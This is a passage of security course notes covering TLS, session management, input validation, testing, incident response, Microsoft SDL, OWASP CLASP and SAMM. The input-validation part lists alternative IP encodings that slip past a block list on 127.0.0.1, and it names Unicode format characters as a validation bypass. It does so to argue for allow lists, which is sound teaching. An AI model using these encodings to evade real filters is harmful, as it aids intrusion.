- **Purpose:** TLS ensures that the data transmitted between the client and the server
has not been tampered with during transmission.

- **Hash Functions:** Cryptographic hash functions are used to generate checksums


(hashes) for the transmitted data. The recipient can verify the integrity of the data by
comparing the received hash with the calculated hash.

### 4. **Secure Handshake:**

- **Purpose:** Before establishing a secure connection, the client and server perform a
handshake to negotiate the encryption algorithms, exchange necessary parameters, and
authenticate each other.

- **Key Exchange:** During the handshake, a process called key exchange occurs,
where the client and server agree on a shared secret key for encrypting and decrypting data.

### 5. **Forward Secrecy:**

- **Purpose:** TLS supports Perfect Forward Secrecy (PFS), ensuring that even if a
long-term secret key is compromised, past communication cannot be decrypted.

- **Key Agreement Protocols:** PFS is typically achieved using key agreement


protocols like Diffie-Hellman.

### 6. **Versions:**

- **Evolution:** TLS has undergone several versions, with each version addressing
security vulnerabilities and improving cryptographic mechanisms.

- **Current Versions:** TLS 1.3, published in 2018, is the latest version, offering improved security and performance compared to earlier versions.

### 7. **Cipher Suites:**

- **Purpose:** Cipher suites are combinations of encryption, hash, and key exchange
algorithms used to secure the connection.



- **Choosing Strong Cipher Suites:** It's important to configure the web server to use
strong and secure cipher suites, while disabling support for weak or vulnerable algorithms.

### 8. **TLS in HTTPS:**

- **Implementation:** In web applications, TLS is commonly implemented through


HTTPS (HTTP Secure). This ensures that the communication between the client and the
server occurs over a secure, encrypted connection.

- **URL Prefix:** URLs using HTTPS start with "https://" instead of "http://".

### 9. **Security Best Practices:**

- **Regular Certificate Renewal:** TLS certificates have an expiration date.


Regularly renew certificates to maintain the security of the connection.

- **HSTS (HTTP Strict Transport Security):** Implement HSTS to enforce the use of
HTTPS, reducing the risk of downgrade attacks.

- **OCSP Stapling:** Optionally, use Online Certificate Status Protocol (OCSP)


stapling to reduce the latency in certificate status verification.

TLS is a critical component of web application security, providing a secure foundation for the
transmission of sensitive data. As cyber threats evolve, it's essential to stay informed about the
latest TLS versions, vulnerabilities, and best practices to ensure the continued security of web
applications.
Session Management - Input Validation
**Session Management in Web Application Security:**

Session management is a crucial aspect of web application security that involves the
creation, maintenance, and termination of user sessions. A session is a period of interaction
between a user and a web application, typically starting when a user logs in and ending when
they log out or their session becomes inactive. Proper session management is essential for
protecting user data and preventing unauthorized access. Key considerations include:



1. **Session ID Security:**
- Use secure methods for generating and transmitting session IDs, ensuring they cannot
be easily guessed or intercepted.

- Implement secure random number generators for creating session IDs.


- Avoid exposing session IDs in URLs, as they can be more easily
compromised.

2. **Session Timeout:**
- Define reasonable session timeout values to automatically log out users after a period of
inactivity.

- Notify users before sessions expire to allow them to extend their session if needed.

3. **Session Fixation:**
- Implement measures to prevent session fixation attacks where an attacker sets a user's
session ID to a known value.

- Generate a new session ID upon login or after certain privileged operations.

4. **Secure Cookie Attributes:**

- Set secure attributes for session cookies, such as the 'Secure' attribute, to ensure they are transmitted only over secure (HTTPS) connections.

- Use the 'HttpOnly' attribute to prevent client-side script access to cookies. (A configuration sketch follows this list.)

5. **Logout Functionality:**
- Provide a secure logout mechanism that effectively terminates a user's session.
- Invalidate session data on the server side upon logout.

6. **Session Revocation:**



- Enable administrators to revoke sessions in the case of suspicious activity or a
compromised account.

- Implement mechanisms to force a re-authentication after certain sensitive operations.

7. **Session Data Protection:**


- Avoid storing sensitive information in session variables whenever possible.
- Encrypt session data if it needs to be stored on the server.

8. **Cross-Site Request Forgery (CSRF) Protection:**

- Implement anti-CSRF tokens to protect against CSRF attacks, where an attacker forces a user to perform unintended actions without their consent (see the sketch after this list).

9. **IP Address Checking:**


- Optionally, consider associating sessions with specific IP addresses to prevent
session hijacking.
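
Tying together items 4 and 8 above, here is a minimal Flask sketch that hardens the session cookie and checks a per-session anti-CSRF token. Flask is an assumption for illustration, and the route names and form fields are invented for the example.

```python
import hmac
import secrets

from flask import Flask, abort, request, session

app = Flask(__name__)
app.secret_key = secrets.token_bytes(32)  # signs the session cookie

# Item 4: harden the session cookie.
app.config.update(
    SESSION_COOKIE_SECURE=True,       # send only over HTTPS
    SESSION_COOKIE_HTTPONLY=True,     # hide from client-side scripts
    SESSION_COOKIE_SAMESITE="Lax",    # limit cross-site sends
    PERMANENT_SESSION_LIFETIME=1800,  # 30-minute timeout, in seconds
)

# Item 8: issue and verify a per-session anti-CSRF token.
@app.route("/form")
def form():
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return (
        '<form method="post" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{token}">'
        "<button>Send</button></form>"
    )

@app.route("/transfer", methods=["POST"])
def transfer():
    sent = request.form.get("csrf_token", "")
    if not hmac.compare_digest(sent, session.get("csrf_token", "")):
        abort(403)  # request did not originate from our own form
    return "ok"
```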

**Input Validation in Web Application Security:**

Input validation is a critical component of web application security that involves checking
user inputs for correctness, security, and adherence to predefined criteria. Proper input
validation helps prevent a range of vulnerabilities, including injection attacks and cross-site
scripting. Key considerations include:

1. **Data Type Validation:**


- Ensure that input conforms to the expected data type (e.g., numbers, dates) to prevent
unexpected behavior or security issues.

2. **Length and Size Checks:**



- Validate that input lengths are within acceptable ranges to prevent buffer overflows
and other related vulnerabilities.

3. **Whitelisting Input:**
- Define and enforce a whitelist of allowed characters, rejecting input that includes
disallowed or special characters.

- Avoid using blacklists, as they can be less effective and prone to evasion.

4. **Regular Expressions:**
- Use regular expressions to define and enforce patterns for valid input.
- Be cautious with complex regular expressions to avoid security issues like denial-of-
service (DoS) attacks.

5. **HTML Entity Encoding:**


- Encode user input to prevent cross-site scripting (XSS) attacks. Convert special
characters to their HTML entity equivalents.

6. **Parameterized Queries:**
- When dealing with databases, use parameterized queries or prepared statements to prevent SQL injection attacks (see the sketch after this list).

7. **File Upload Validation:**


- If your application allows file uploads, implement strict validation on file types, size,
and content to prevent malicious file uploads.

8. **Client-Side Validation:**
- Implement client-side validation for a smoother user experience, but always validate
inputs on the server side as well to ensure security.

- Do not rely solely on client-side validation for security.



9. **Error Handling:**
- Customize error messages to avoid revealing too much information about the system or
underlying infrastructure.

- Provide generic error messages to users and log detailed errors for
administrators.

10. **Security Headers:**


- Use security headers, such as Content Security Policy (CSP), to mitigate the risk of
certain types of injection attacks.
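
As promised in item 6, here is a minimal sketch of a parameterized query using Python's built-in sqlite3 module. The table and the injection payload are contrived for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_input = "alice' OR '1'='1"  # classic injection payload

# Unsafe (never do this): concatenation lets the payload rewrite the SQL.
#   "SELECT email FROM users WHERE name = '" + user_input + "'"

# Safe: the ? placeholder binds user input as data, never as SQL code.
rows = conn.execute(
    "SELECT email FROM users WHERE name = ?", (user_input,)
).fetchall()
print(rows)  # [] -- the payload matches no user instead of dumping the table
```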

By prioritizing effective session management and input validation, web applications can
significantly reduce the risk of common security vulnerabilities and provide a more secure
experience for users. Regularly updating and patching software components, staying
informed about emerging threats, and conducting thorough security testing are also essential
practices in maintaining robust web application security.
Input Validation
Overview
This page contains recommendations for the implementation of input validation.

Do not use input validation as the primary method of preventing Cross-Site Scripting, SQL
injection and other attacks which are covered by the Vulnerability Mitigation section.
Nevertheless, input validation can make a significant contribution to reducing the impact of
these attacks if implemented properly.

General
Perform input validation for data from all potentially untrusted sources, including suppliers,
partners, vendors, regulators, internal components or applications.

 Perform input validation for all user-controlled data, see Data source for
validation .
 Perform input validation as early as possible in a data flow, preferably as soon as
data is received from an external party before it is processed by an application.
 Implement input validation on the server side. Do not rely solely on validation
on the client side.



 Implement centralized input validation functionality.

Clarification

 Implement the following validation scheme:


o Normalize processed data, see Normalization .
o Perform a syntactic validation of the processed data, see Syntactic
validation .
o Perform a semantic validation of the processed data, see Semantic
validation .
 Implement protection against mass parameter assignment attacks.
 Log errors in the input validation, see the Logging and Monitoring page.
 Comply with requirements from the Error and Exception Handling page.

Normalization

 Ensure all the processed data is encoded in an expected encoding (for instance,
UTF- 8) and no invalid characters are present.
 Use NFKC canonical encoding form to treat canonically equivalent symbols.
 Define a list of allowed Unicode characters for data input and reject input with
characters outside the allowed character list. For example, avoid Cf (Format) Unicode
characters, commonly used to bypass validation or sanitization.

Clarification

Unicode classifies characters within different categories. Unicode characters have multiple uses, and their category is determined based on the primary characteristic of the character. There are printable characters such as:

 Lu uppercase letters.
 Mn nonspacing marks, for example, accents and other letter decorations.
 Nd decimal numbers.
 Po other punctuation, for example, the Full Stop character '.'.
 Zs space separator.
 Sm math symbol, for example, < or =.

and non-printable characters such as:

 Cc control.
 Cf format.

The last two categories (non-printable characters) are the most used in attacks trying to bypass input validation, and therefore they should be avoided if not needed. For more information on categories, please see https://www.unicode.org/reports/tr44/#General_Category_Values.
There are three approaches to handle not-allowed characters:



 Recommended (rigorous and safe): reject the input completely if it has any
character outside of allowed character lists.
 Not recommended (lenient but safe): replace not-allowed characters with the
Replacement Character U+FFFD.
 Not recommended (unsafe): remove not-allowed characters from input. This
approach could have unexpected behaviors and be used by attackers to bypass
subsequent validation. Therefore, this approach should never be used.

Example of an allowed character list:

 L (Letter, contains Lu | Ll | Lt | Lm | Lo categories)


 N (Number, contains Nd | Nl | No categories)
 P (Punctuation, contains Pc | Pd | Ps | Pe | Pi | Pf | Po categories)
 S (Symbol, contains Sm | Sc | Sk | So categories)
 Z (Separator, contains Zs | Zl | Zp categories)
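
A minimal sketch of the normalization scheme above, using Python's standard unicodedata module: input is converted to NFKC form and rejected outright (the recommended rigorous-and-safe option) if any character falls outside the allowed categories listed.

```python
import unicodedata

# One-letter prefixes of the allowed Unicode categories listed above.
ALLOWED_CATEGORY_PREFIXES = ("L", "N", "P", "S", "Z")

def normalize_and_validate(text: str) -> str:
    """NFKC-normalize, then reject input containing disallowed characters."""
    normalized = unicodedata.normalize("NFKC", text)
    for ch in normalized:
        if not unicodedata.category(ch).startswith(ALLOWED_CATEGORY_PREFIXES):
            # Rigorous-and-safe option: reject the input completely.
            raise ValueError(f"disallowed character U+{ord(ch):04X}")
    return normalized

print(normalize_and_validate("Order ≤ 100"))  # accepted: L, Zs, Sm, Nd categories
# normalize_and_validate("file\u202Etxt")     # rejected: U+202E is Cf (format)
```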

Syntactic validation
Use data type validators built into the used web framework.

 Validate against JSON Schema and XML Schema (XSD) for input in these formats.
 Validate input against expected data type, such as integer, string, date, etc.
 Validate input against expected value range for numerical parameters and dates. If the
business logic does not define a value range, consider value range imposed by
language or database.
 Validate input against minimum and/or maximum length for strings.
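
As a sketch of syntactic validation against a JSON Schema, the following uses the third-party jsonschema package (an assumption; any schema validator built into your framework serves the same purpose) with a hypothetical order payload.

```python
from jsonschema import ValidationError, validate  # pip install jsonschema

ORDER_SCHEMA = {
    "type": "object",
    "properties": {
        "item_id": {"type": "integer", "minimum": 1},
        "quantity": {"type": "integer", "minimum": 1, "maximum": 100},
        "note": {"type": "string", "maxLength": 200},
    },
    "required": ["item_id", "quantity"],
    "additionalProperties": False,  # also helps block mass parameter assignment
}

def validate_order(payload: dict) -> None:
    try:
        validate(instance=payload, schema=ORDER_SCHEMA)
    except ValidationError as err:
        raise ValueError(f"invalid input: {err.message}") from None

validate_order({"item_id": 7, "quantity": 2})        # passes silently
# validate_order({"item_id": 7, "quantity": "two"})  # raises ValueError
```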

Semantic validation
Define an allow list and validate all data against this list. Avoid using block list validation.
Clarification
There are two main validation approaches:

 Allow list validation verifies that data complies with a known list of allowed values,
anything else is considered as invalid data.
 Block list validation verifies that data does not match any known blocked values. If
so, the data is considered invalid, anything else is considered valid data. Note that if a
block list validation is used, input data must be normalized before any comparison,
validation or processing. If normalization is not done properly, block list validation
can be easily bypassed.

Unfortunately, block list validation may miss unknown bad values that an attacker could leverage to bypass the validation. For example, if an application handles IP addresses, an attacker can bypass a block list that contains 127.0.0.1 using rare IP formats:
127.1
0x7f.0x0.0x0.0x1
0x7f001



...

 Define an array of allowed values as a small set of string parameters (e.g. days of a
week).
 Define a list of allowed characters such as decimal digits or letters.
 You can use regular expressions to define allowed values, see the Regular
Expressions page.
 Implement file validation according to the File Upload page.
 Implement email validation according to the Authentication: Email Address
Confirmation page.

Session Management
Overview
This page contains recommendations for the implementation of session management. There

are two approaches to session management: Stateful and Stateless.

 In the case of the Stateful approach, a session token is generated on the server
side, saved to a database and passed to a client. The client uses this token to make
requests to the server side. Therefore, the server-side stores the following bundle:
account_id:session_id.
 In the case of the Stateless approach, a session token is generated on the server side
(or by a third-party service), signed using a private key (or secret key) and passed to
a client. The client uses this token to make requests to the server side. Therefore, the
server side needs to store a public key (or secret
key) to validate the signature.

General
Use the base cookie format to store session IDs; see the Cookie page.
Security

 Do not store any sensitive data (tokens, credentials, PII, etc.) in a session ID.
 Use the session management built into the framework you are using instead of
implementing a homemade one from scratch.
 Use up-to-date and well-known frameworks and libraries that implement
session management.
 Review and change the default configuration of the framework or library you are
using to enhance its security.
 Consider session IDs as untrusted data, as any other user input.
 Implement an idle or inactivity timeout for every session.




 Implement a mechanism to allow users to actively close a session (logout) after
they have finished using an application.
 Invalidate the session at least on the server side while closing a session.
 Use different session IDs and token names for pre- and post-authentication flows.


 Do not cache session IDs if caching application contents is allowed, see the
Transport Layer Protection page.


 Do not pass a session ID in a URL (path, query or fragment).


 Renew or regenerate a session ID after any privilege level change within the
associated user session (anonymous -> regular user, regular user -> admin user, etc.).

 Handle and store session IDs according to the Session Management page.
 Log successful and unsuccessful events related to a session lifecycle (such as
creation, regeneration, revoke) including attempts to access resources with
invalid session IDs, see the Logging and Monitoring page.

Use the ultimate cookie format to store session IDs, see the Cookie Security page.

 If a framework is used, change the default session ID name to something
neutral, for example, sessionid or id.
 Implement an absolute timeout for every session regardless of session activity.

 Provide users with the ability to manage active sessions (view and close active
sessions).

Stateful approach related


Generate a session ID using a cryptographically strong generator, see the Cryptography:
Random Generators page.

 Use session IDs of length 16+ bytes.



 Do not accept a session ID that has never been generated by the application. If one
is received, generate a new one for anonymous access and assign it to the user.
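
A minimal sketch of generating and storing a stateful session ID in Python using the standard-library secrets module; the dictionary standing in for the server-side store is an illustrative assumption:

import secrets

SESSION_STORE = {}  # stand-in for the server-side database: session_id -> account_id

def create_session(account_id):
    # 32 random bytes from a CSPRNG, well above the 16-byte minimum.
    session_id = secrets.token_urlsafe(32)
    SESSION_STORE[session_id] = account_id
    return session_id

def resolve_session(session_id):
    # Unknown IDs are rejected; the caller should then issue a fresh anonymous session.
    return SESSION_STORE.get(session_id)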

Stateless approach related


Use JSON Web Tokens (JWT) to implement stateless session management, see
the JSON Web Token (JWT) page.

 Use the exp claim to implement a session timeout.


 Use the following algorithm to implement the logout functionality:
o Store the jti claim (unique token identifier) for each issued token.
o If a user logged out from an application, move the jti to a list of
blocked tokens.
o Remove a token from the block list when a token expires (check the exp
claim to determine if a token has expired)
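
A minimal sketch of this logout algorithm, assuming the PyJWT library and an in-memory block list (the secret, lifetime, and names are illustrative):

import time, uuid
import jwt  # PyJWT

SECRET = "change-me"       # illustrative signing key; store securely in practice
BLOCKED_JTIS = set()       # jti values of tokens revoked by logout

def issue_token(account_id, ttl_seconds=900):
    claims = {"sub": account_id, "jti": str(uuid.uuid4()),
              "exp": int(time.time()) + ttl_seconds}
    return jwt.encode(claims, SECRET, algorithm="HS256")

def logout(token):
    claims = jwt.decode(token, SECRET, algorithms=["HS256"])
    BLOCKED_JTIS.add(claims["jti"])  # keep blocked until the exp time passes, then purge

def is_valid(token):
    try:
        # decode() verifies the signature and the exp claim automatically.
        claims = jwt.decode(token, SECRET, algorithms=["HS256"])
    except jwt.InvalidTokenError:
        return False
    return claims["jti"] not in BLOCKED_JTIS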



UNIT II SECURE DEVELOPMENT AND DEPLOYMENT
Web Applications Security:
Securing web applications is a critical aspect of software development and deployment. The
goal is to protect the application and its users from various security threats and vulnerabilities.
Here are key practices for secure development and deployment of web applications:

Secure Development Practices:

1. Input Validation:
 Validate and sanitize all user inputs to prevent injection attacks (e.g., SQL
injection, cross-site scripting).
 Use parameterized queries to prevent SQL injection (a sketch follows this list).

2. Authentication and Authorization:


 Implement strong authentication mechanisms, including multi-factor
authentication when possible.
 Follow the principle of least privilege for user permissions.
 Regularly review and update access controls.

3. Session Management:
 Use secure and random session IDs.
 Implement session timeout and reauthentication for sensitive actions.
 Store session data securely, preferably on the server side.
4. Cross-Site Request Forgery (CSRF) Protection:
 Include anti-CSRF tokens in forms.
 Ensure that state-changing requests require proper authentication.
5. Cross-Origin Resource Sharing (CORS):
 Implement proper CORS policies to control which domains can access
resources.
 Avoid overly permissive CORS configurations.

6. Security Headers:
 Utilize security headers like Content Security Policy (CSP), Strict-
Transport-Security (HSTS), and X-Content-Type-Options.
7. File Upload Security:
 Validate file types and enforce size limits.
 Store uploaded files in a secure location outside the web root.
8. Error Handling:
 Provide custom error pages to avoid leaking sensitive information.
 Log errors securely without exposing sensitive data.
9. Code Reviews and Static Analysis:

 Regularly conduct code reviews to identify security vulnerabilities.
 Use static analysis tools to scan code for potential security issues.
10. Dependency Management:
 Keep all dependencies up-to-date to patch known vulnerabilities.
 Use a secure package manager and regularly audit dependencies.
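
As referenced in item 1 above, a minimal sketch of a parameterized query using Python's built-in sqlite3 module; the table and column names are illustrative:

import sqlite3

def find_user(conn, username):
    # The ? placeholder keeps user input out of the SQL text entirely,
    # so input like "admin' OR '1'='1" is treated as data, not code.
    cur = conn.execute("SELECT id, username FROM users WHERE username = ?", (username,))
    return cur.fetchone()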

Secure Deployment Practices:

1. Web Application Firewall (WAF):


 Deploy a WAF to filter and monitor HTTP traffic between a web
application and the Internet.
 Configure the WAF to protect against common web application attacks.

2. HTTPS:
 Enforce the use of HTTPS to encrypt data in transit.
 Use strong, up-to-date encryption protocols and ciphers.
3. Secure Configuration:
 Disable unnecessary services and features.
 Follow security best practices for server and database configurations.
4. Continuous Monitoring:
 Implement monitoring solutions to detect and respond to security
incidents.
 Regularly review logs for suspicious activities.

5. Incident Response Plan:


 Develop and document an incident response plan.
 Test the plan regularly to ensure a swift and effective response.
6. Data Backups:
 Regularly backup data and ensure the backups are secure.
 Test data restoration procedures to guarantee recoverability.
7. Environment Isolation:
 Isolate production, development, and testing environments.
 Limit access to production systems to only authorized personnel.
8. Regular Security Audits:
 Conduct regular security audits and penetration testing.
 Address and remediate any vulnerabilities discovered during audits.
9. Security Training:
 Provide security awareness training for development and operations teams.
 Keep teams informed about the latest security threats and best
practices.

10. Compliance:
 Ensure compliance with relevant security standards and regulations (e.g.,
GDPR, HIPAA).



By incorporating these practices into the development and deployment processes, you can
significantly enhance the security posture of your web applications.
Regularly updating and adapting security measures to address emerging threats is also
crucial for ongoing protection.

Security Testing, Security Incident Response Planning


Security testing and incident response planning are essential components of a
comprehensive cybersecurity strategy. Here's an overview of each:

Security Testing:

1. Penetration Testing:
 Purpose: To identify vulnerabilities and weaknesses in the application or
network.
 Method: Ethical hackers simulate real-world attacks to uncover security issues.
 Frequency: Conduct regular penetration tests, especially after major
updates or changes.
2. Vulnerability Scanning:
 Purpose: Automated tools scan systems for known vulnerabilities.
 Method: Regularly scan networks, applications, and systems for known
security issues.
 Frequency: Implement continuous scanning to detect and address
vulnerabilities promptly.
3. Code Review:
 Purpose: Identifying security vulnerabilities in the source code.
 Method: Manual or automated review of the application's source code.
 Frequency: Regularly integrate code reviews into the development
process.
4. Security Audits:
 Purpose: Comprehensive review of security policies, configurations, and
practices.
 Method: Evaluate all aspects of security, including physical security,
policies, and procedures.
 Frequency: Conduct periodic security audits to ensure ongoing
compliance and effectiveness.
5. Security Automation:
 Purpose: Automating security tests and checks.
 Method: Use tools for automated security testing, such as static analysis
tools, dynamic analysis tools, and security scanning tools.



 Frequency: Integrate automation into the development and testing pipeline.
6. Compliance Testing:
 Purpose: Ensure compliance with relevant security standards and regulations.
 Method: Evaluate the system against specific compliance requirements.
 Frequency: Regularly assess and update compliance measures.

Security Incident Response Planning:

1. Incident Response Team:


 Formation: Establish a dedicated incident response team.
 Roles: Define roles and responsibilities for team members.
 Training: Ensure the team is trained and regularly updated on incident
response procedures.
2. Incident Identification:
 Detection Systems: Implement systems to detect and alert on security
incidents.
 Monitoring: Continuously monitor logs and network traffic for anomalies.
 User Reporting: Encourage users to report suspicious activities
promptly.
3. Incident Classification and Triage:
 Classification: Define incident severity levels.
 Triage: Develop a process for quickly assessing and categorizing
incidents.
4. Incident Containment:
 Isolation: Quickly isolate affected systems to prevent further damage.
 Communication: Establish clear communication channels within the
response team and with relevant stakeholders.
5. Eradication and Recovery:
 Root Cause Analysis: Identify and eliminate the root cause of the
incident.
 System Restoration: Restore affected systems from clean backups.
 Validation: Verify that the systems are free from compromise.
6. Communication and Notification:
 Internal Communication: Keep the internal team and relevant
stakeholders informed.
 External Communication: Develop a communication plan for
notifying external parties, such as customers, regulatory bodies, and law
enforcement if necessary.



7. Post-Incident Analysis:
 Debriefing: Conduct a thorough post-incident analysis.
 Documentation: Document lessons learned and update incident
response plans accordingly.
 Continuous Improvement: Use the insights gained to enhance incident
response capabilities.

8. Legal and Regulatory Compliance:
 Reporting: Comply with legal and regulatory requirements for reporting incidents.
 Documentation: Maintain documentation to demonstrate compliance efforts.
9. Training and Exercises:
 Regular Drills: Conduct simulated incident response drills.
 Training Programs: Ensure ongoing training for the incident response team
and relevant staff.
10. Documentation and Record-Keeping:
 Incident Logs: Keep detailed logs of incident response activities.
 Post-Incident Report: Produce a comprehensive post-incident report for
internal and external review.

By implementing a robust security testing program and having a well-defined incident
response plan, organizations can proactively identify and mitigate security risks, respond
effectively to incidents, and continuously improve their overall security posture. Regular
testing, training, and updates to incident response plans are crucial to staying ahead of
evolving cybersecurity threats.

The Microsoft Security Development Lifecycle (SDL)



Security and privacy should never be an afterthought when developing secure software; a
formal process must be in place to ensure they're considered at all points of the product's
lifecycle. Microsoft's Security Development Lifecycle (SDL) embeds



comprehensive security requirements, technology specific tooling, and mandatory processes
into the development and operation of all software products. All development teams at
Microsoft must adhere to the SDL processes and requirements, resulting in more secure
software with fewer and less severe vulnerabilities at a reduced development cost.

Microsoft SDL consists of seven components including five core phases and two supporting
security activities. The five core phases are requirements, design, implementation,
verification, and release. Each of these phases contains mandatory checks and approvals to
ensure all security and privacy requirements and best practices are properly addressed. The
two supporting security activities, training and response, are conducted before and after the
core phases respectively to ensure they're properly implemented, and software remains
secure after deployment.

Training

All Microsoft employees are required to complete general security awareness training and
specific training appropriate to their role. Initial security awareness training is provided to
new employees upon hire and annual refresher training is required throughout their
employment at Microsoft.

Developers and engineers must also participate in role specific training to keep them
informed on security basics and recent trends in secure development. All full-time
employees, interns, contingent staff, subcontractors, and third parties are also encouraged
and provided with the opportunity to seek advanced security and privacy training.



Requirements

Every product, service, and feature Microsoft develops starts with clearly defined security and
privacy requirements; they're the foundation of secure applications and inform their design.
Development teams define these requirements based on factors such as the type of data the
product will handle, known threats, best practices, regulations and industry requirements, and
lessons learned from previous incidents. Once defined, the requirements are clearly
documented and tracked.

Software development is a continuous process, meaning that the associated security and
privacy requirements change throughout the product's lifecycle to reflect changes in
functionality and the threat landscape.

Design

Once the security, privacy, and functional requirements have been defined, the design of the
software can begin. As a part of the design process, threat models are created to help
identify, categorize, and rate potential threats according to risk.
Threat models must be maintained and updated throughout the lifecycle of each product as
changes are made to the software.



The threat modeling process begins by defining the different components of a product and
how they interact with each other in key functional scenarios, such as authentication. Data
Flow Diagrams (DFDs) are created to visually represent key data flow interactions, data
types, ports, and protocols used. DFDs are used to identify and prioritize threats for
mitigation that are added to the product's security requirements.

Developers are required to use Microsoft's Threat Modeling Tool for all threat models,
which enables the team to:

 Communicate about the security design of their systems


 Analyze security designs for potential security issues using a proven
methodology
 Suggest and manage mitigation for security issues

Before any product is released, all threat models are reviewed for accuracy and completeness,
including mitigation for unacceptable risks.



Implementation

Implementation begins with developers writing code according to the plan they created in
the previous two phases. Microsoft provides developers with a suite of secure development
tools to effectively implement all the security, privacy, and function requirements of the
software they design. These tools include compilers, secure development environments, and
built-in security checks.

Verification

Before any written code can be released, several checks and approvals are required to verify
that the code conforms to SDL, meets design requirements, and is free of coding errors.
SDL requires that manual reviews are conducted by a reviewer separate from the personnel
who developed the code. Separation of duties is an important control in this step to ensure no
code can be written and released by the same person, which could lead to accidental or
malicious harm.

Various automated checks are also required and are built into the commit pipeline to analyze
code during check-in and when builds are compiled. The security checks used at Microsoft
fall into the following categories:

 Static code analysis: Analyzes source code for potential security flaws,
including the presence of credentials in code.
 Binary analysis: Assesses vulnerabilities at the binary code level to confirm
code is production ready.
 Credential and secret scanner: Identify possible instances of credential and
secret exposure in source code and configuration files.
 Encryption scanning: Validates encryption best practices in source code and
code execution.
 Fuzz testing: Use malformed and unexpected data to exercise APIs and parsers
to check for vulnerabilities and validate error handling.
 Configuration validation: Analyzes the configuration of production systems
against security standards and best practices.
 Component Governance (CG): Open-source software detection and checking
of version, vulnerability, and legal obligations.

If the manual reviewer or automated tools find any issues in the code, the submitter will be
notified, and they're required to make the necessary changes before submitting it for review
again.

Additionally, penetration tests are regularly conducted on Microsoft online services by both
internal and external providers. Penetration tests provide another means for discovering
security flaws not detected by other methods. To learn more about penetration testing at
Microsoft, see Attack simulation in Microsoft 365.



Release

After passing all required security tests and reviews, builds aren't immediately released to
all customers. Builds are systematically and gradually released to larger and larger groups,
referred to as rings, in what is called a safe deployment process (SDP). The SDP rings are
defined as follows:

 Ring 0: The development team responsible for the service


 Ring 1: All Microsoft employees
 Ring 2: Users outside of Microsoft who have configured their organization or
specific users to be on the targeted release channel
 Ring 3: Worldwide standard release in sub-phases

Builds remain in each of these rings for an appropriate number of days, including high-load
periods, except for Ring 3, since by then the build has been appropriately tested for stability
in the earlier rings.

OWASP Comprehensive Lightweight Application Security Process (CLASP)


Concepts View
CLASP — Comprehensive, Lightweight Application Security Process — is an activity-driven,
role-based set of process components whose core contains formalized best practices for building
security into your existing or new-start software development lifecycles in a structured, repeatable,
and measurable way.
CLASP is the outgrowth of years of extensive field work in which system resources of many
development lifecycles were methodically decomposed in order to create a comprehensive
set of security requirements. These resulting requirements form the basis of CLASP’s best
practices which allow organizations to systematically address vulnerabilities that, if exploited, can
result in the failure of basic security services — e.g., confidentiality, authentication, and access
control.

• Adaptability of CLASP to Existing Development Processes


CLASP is designed to allow you to easily integrate its security-related activities into your
existing application development processes. Each



CLASP activity is divided into discrete process components and linked to one or more specific
project roles. In this way, CLASP provides guidance to project participants — e.g., project
managers, security auditors, developers, architects, testers, and others — that is easy to adapt
to their way of working; this results in incremental improvements to security that are easily
achievable, repeatable, and measurable.

• CLASP Vulnerability Lexicon


CLASP also contains a comprehensive Vulnerability Lexicon that helps development teams
avoid/remediate specific design and coding errors that can leave basic security services exploitable.
The basis of this Lexicon is a highly flexible taxonomy — i.e., classification structure — that enables
development teams to quickly locate Lexicon
information from many perspectives: e.g., problem types (i.e., basic causes of vulnerabilities);
categories of problem types; exposure periods; avoidance and mitigation periods; consequences
of exploited vulnerabilities; affected platforms and programming languages; risk assessment.

• Automated Analysis Tools


Much of the information in the CLASP Vulnerability Lexicon can be enforced through use of
automated tools using techniques of static analysis of source code.
Overview of CLASP Process
This section provides an overview of CLASP’s structure and of the dependencies between the
CLASP process components and is organized as follows:

• CLASP Views
• CLASP Resources
• Vulnerability Use Cases



CLASP Views
The CLASP process is presented through five high-level perspectives called CLASP Views. These
views are broken down into activities which in turn contain process components. This top-down
organization by View > Activity > Process Component allows you to quickly understand the
CLASP process, how CLASP pieces interact, and how to apply them to your specific software
development lifecycle.
These are the CLASP Views:

• Concepts View
• Role-Based View
• Activity-Assessment View
• Activity-Implementation View
• Vulnerability View
The following figure shows the CLASP Views and their interactions.
CLASP Resources
The CLASP process supports planning, implementing and performing security-related software
development activities. The CLASP Resources provide access to artifacts that are especially useful if
your project is using tools to help automate CLASP process pieces. This table lists the name
and location of the CLASP Resources delivered with CLASP and indicates which CLASP
Views they can support:

• Basic Principles in Application Security (all Views) - Resource A
• Example of Basic Principle: Input Validation (all Views) - Resource B
• Example of Basic-Principle Violation: Penetrate-and-Patch Model (all Views) - Resource C
• Core Security Services (all Views; especially III) - Resource D
• Sample Coding Guideline Worksheets (Views II, III & IV) - Resource E (each worksheet can be pasted into a MS Word document)
• System Assessment Worksheets (Views III & IV) - Resource F (each worksheet can be pasted into a MS Word document)
• Sample Road Map: Legacy Projects (View III) - Resource G1
• Sample Road Map: New-Start Projects (View III) - Resource G2
• Creating the Process Engineering Plan (View III) - Resource H
• Forming the Process Engineering Team (View III) - Resource I
• Glossary of Security Terms (all Views) - Resource J
Vulnerability Use Cases
The CLASP Vulnerability Use Cases depict conditions under which security services can
become vulnerable in software applications. The Use Cases provide CLASP users with easy-to-
understand, specific examples of the cause-and-effect relationship between security-unaware
design/source coding and possible resulting vulnerabilities in basic security services — e.g.,
authentication, authorization, confidentiality, availability, accountability, and non-repudiation.
The CLASP Vulnerability Use Cases are based on the following common component
architectures:

• Monolithic UNIX
• Monolithic mainframe
• Distributed architecture (HTTP[S] & TCP/IP)
It is recommended to understand the CLASP Use Cases as a bridge from the Concepts View
of CLASP to the Vulnerability Lexicon (in the Vulnerability View) since they provide specific
examples of security services becoming vulnerable in software applications.
CLASP Best Practices



If security vulnerabilities built into your applications’ source code survive into production, they
can become corporate liabilities with broad and severe business impact on your organization. In
view of the consequences of exploited security vulnerabilities, there is no reasonable alternative
to using best practices of application security as early as possible in — and throughout — your
software development lifecycle.

The Software Assurance Maturity Model (SAMM)

Software Assurance Maturity Model

Our mission is to provide an effective and measurable way for you to analyze and improve
your secure development lifecycle. SAMM supports the complete software lifecycle and is
technology and process agnostic. We built SAMM to
be evolutive and risk-driven in nature, as there is no single recipe that works for all
organizations.




The Software Assurance Maturity Model (SAMM) is an open framework to help


organizations formulate and implement a strategy for software security that is tailored to the
specific risks facing the organization. SAMM helps you:

